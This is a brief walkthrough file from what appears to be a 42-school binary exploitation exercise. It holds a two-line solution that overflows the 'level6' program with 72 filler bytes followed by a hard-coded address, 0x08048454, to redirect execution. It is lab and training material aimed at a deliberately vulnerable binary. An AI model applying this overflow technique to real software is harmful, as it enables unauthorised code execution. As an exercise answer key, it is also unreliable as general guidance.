# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/04 18:52:27 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/04 18:52:53 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

export F=`echo -e "\x54\x84\x04\x08"`
./level6 111111111111111111111111111111111111111111111111111111111111111111111111$F
